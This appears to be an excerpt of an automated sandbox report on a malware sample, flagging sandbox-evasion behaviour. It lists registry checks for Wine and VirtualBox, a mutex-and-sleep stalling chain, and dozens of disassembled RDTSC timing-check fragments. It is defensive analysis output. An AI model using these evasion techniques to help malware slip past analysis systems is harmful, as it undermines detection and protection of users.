Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74F7D second address: E74F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74F84 second address: E74F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74F8A second address: E74F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E74F8E second address: E748AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC85D338E39h 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D339Ch], eax 0x00000018 push dword ptr [ebp+122D0BC1h] 0x0000001e mov dword ptr [ebp+122D28C4h], edi 0x00000024 call dword ptr [ebp+122D31DDh] 0x0000002a pushad 0x0000002b jmp 00007FC85D338E36h 0x00000030 xor eax, eax 0x00000032 pushad 0x00000033 push esi 0x00000034 adc eax, 109963B2h 0x0000003a pop ebx 0x0000003b add dword ptr [ebp+122D2D0Eh], eax 0x00000041 popad 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 jmp 00007FC85D338E2Bh 0x0000004b mov dword ptr [ebp+122D35E3h], eax 0x00000051 jno 00007FC85D338E41h 0x00000057 mov esi, 0000003Ch 0x0000005c clc 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 mov dword ptr [ebp+122D30E4h], eax 0x00000067 lodsw 0x00000069 jmp 00007FC85D338E37h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007FC85D338E37h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b pushad 0x0000007c je 00007FC85D338E2Bh 0x00000082 mov edi, 0FAD3706h 0x00000087 mov ax, F958h 0x0000008b popad 0x0000008c push eax 0x0000008d pushad 0x0000008e je 00007FC85D338E28h 0x00000094 push ecx 0x00000095 pop ecx 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5965 second address: FF5977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FC85CDF02A6h 0x0000000c jbe 00007FC85CDF02A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5D4C second address: FF5D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5D52 second address: FF5D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC85CDF02A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF5D60 second address: FF5D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC85D338E34h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF865F second address: FF8684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007FC85CDF02ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8684 second address: FF868B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF868B second address: FF86D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85CDF02B6h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edx 0x00000010 jno 00007FC85CDF02A8h 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FC85CDF02AEh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jnc 00007FC85CDF02A6h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF86D2 second address: FF86D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF86D6 second address: FF86DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF873F second address: FF874A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF874A second address: FF874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF874E second address: FF8785 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jl 00007FC85D338E28h 0x00000016 push edx 0x00000017 jp 00007FC85D338E26h 0x0000001d pop edx 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 jmp 00007FC85D338E2Ah 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f pop edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8785 second address: FF879F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85CDF02B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF879F second address: FF8801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d xor edx, 58B288E2h 0x00000013 push 00000003h 0x00000015 sbb ecx, 32DD3146h 0x0000001b push 00000000h 0x0000001d call 00007FC85D338E2Ch 0x00000022 add dword ptr [ebp+122D229Fh], ecx 0x00000028 pop esi 0x00000029 push 00000003h 0x0000002b xor dword ptr [ebp+122D3288h], ebx 0x00000031 call 00007FC85D338E29h 0x00000036 push eax 0x00000037 jns 00007FC85D338E39h 0x0000003d jmp 00007FC85D338E33h 0x00000042 pop eax 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8801 second address: FF8808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8808 second address: FF888A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jc 00007FC85D338E37h 0x00000013 jmp 00007FC85D338E31h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FC85D338E39h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jng 00007FC85D338E34h 0x00000029 pop eax 0x0000002a mov dword ptr [ebp+122D3139h], edi 0x00000030 lea ebx, dword ptr [ebp+12457591h] 0x00000036 clc 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d push esi 0x0000003e pop esi 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF89C2 second address: FF8A40 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jbe 00007FC85CDF02B9h 0x00000010 je 00007FC85CDF02B3h 0x00000016 jmp 00007FC85CDF02ADh 0x0000001b pop eax 0x0000001c or dword ptr [ebp+122D25F0h], edi 0x00000022 push 00000003h 0x00000024 jmp 00007FC85CDF02B9h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC85CDF02A8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000003h 0x00000047 mov edi, dword ptr [ebp+122D3139h] 0x0000004d push ED402C0Eh 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8A40 second address: FF8A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8A44 second address: FF8A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a xor dword ptr [esp], 2D402C0Eh 0x00000011 movzx edi, ax 0x00000014 lea ebx, dword ptr [ebp+1245759Ah] 0x0000001a mov edi, dword ptr [ebp+122D3653h] 0x00000020 xchg eax, ebx 0x00000021 push edx 0x00000022 jmp 00007FC85CDF02B1h 0x00000027 pop edx 0x00000028 push eax 0x00000029 pushad 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8A8F second address: FF8A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8B38 second address: FF8B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF8B3C second address: FF8BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 4CD11BD2h 0x0000000e mov edx, 7C755018h 0x00000013 push 00000003h 0x00000015 mov ecx, 0709D4B9h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FC85D338E28h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 sub di, 7511h 0x0000003b push 00000003h 0x0000003d mov edi, dword ptr [ebp+122D2D27h] 0x00000043 push A6E02962h 0x00000048 pushad 0x00000049 jng 00007FC85D338E28h 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 pop eax 0x00000054 popad 0x00000055 popad 0x00000056 add dword ptr [esp], 191FD69Eh 0x0000005d add dword ptr [ebp+122D25F0h], ebx 0x00000063 lea ebx, dword ptr [ebp+124575A5h] 0x00000069 and esi, dword ptr [ebp+122D29B2h] 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FC85D338E35h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019323 second address: 1019328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1019328 second address: 1019331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF0868 second address: FF08A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC85CDF02A6h 0x0000000a jno 00007FC85CDF02A6h 0x00000010 popad 0x00000011 jmp 00007FC85CDF02AEh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FC85CDF02B2h 0x0000001f jmp 00007FC85CDF02ACh 0x00000024 push eax 0x00000025 push edx 0x00000026 jnp 00007FC85CDF02A6h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF08A4 second address: FF08AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10176C5 second address: 10176E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007FC85CDF02BCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10176E6 second address: 10176EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10176EE second address: 10176F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10182CF second address: 10182E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E30h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018A27 second address: 1018A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018A31 second address: 1018A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FC85D338E26h 0x0000000f jne 00007FC85D338E26h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018B96 second address: 1018BAA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC85CDF02A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC85CDF02A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018BAA second address: 1018BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FC85D338E67h 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FC85D338E26h 0x00000016 jne 00007FC85D338E26h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018BC6 second address: 1018BDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FC85CDF02A6h 0x0000000d jng 00007FC85CDF02A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018E98 second address: 1018EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85D338E38h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018EB4 second address: 1018EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A73F second address: 101A743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A743 second address: 101A75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC85CDF02AFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A75C second address: 101A762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A762 second address: 101A771 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FC85CDF02A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101FE46 second address: 101FE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101FF14 second address: 101FF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10239CC second address: 10239D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1023C62 second address: 1023C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10240E9 second address: 10240ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102634B second address: 102634F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026753 second address: 1026758 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269C3 second address: 10269C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269C9 second address: 10269D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC85D338E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10269D3 second address: 10269D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026EEC second address: 1026EF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026FA6 second address: 1026FBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a or edi, dword ptr [ebp+122D1C2Dh] 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026FBC second address: 1026FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1026FC3 second address: 1026FF0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC85CDF02B9h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007FC85CDF02A8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027A73 second address: 1027A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027A79 second address: 1027A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FC85CDF02A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1027A86 second address: 1027B12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e add dword ptr [ebp+122D2A26h], ecx 0x00000014 mov ax, E4DEh 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FC85D338E28h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub dword ptr [ebp+122D2612h], edx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FC85D338E28h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Dh 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 add esi, 0E39DE41h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FC85D338E36h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1028B6E second address: 1028B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1028B73 second address: 1028B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029F1A second address: 1029F2C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC85CDF02A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC85CDF02A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029F2C second address: 1029FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC85D338E2Dh 0x00000011 je 00007FC85D338E28h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FC85D338E28h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 push ecx 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 mov edi, dword ptr [ebp+122D332Eh] 0x0000003f mov edi, dword ptr [ebp+122D377Fh] 0x00000045 push 00000000h 0x00000047 pushad 0x00000048 stc 0x00000049 jmp 00007FC85D338E37h 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029FB8 second address: 1029FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102A9A9 second address: 102A9AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102B425 second address: 102B42F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC85CDF02A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
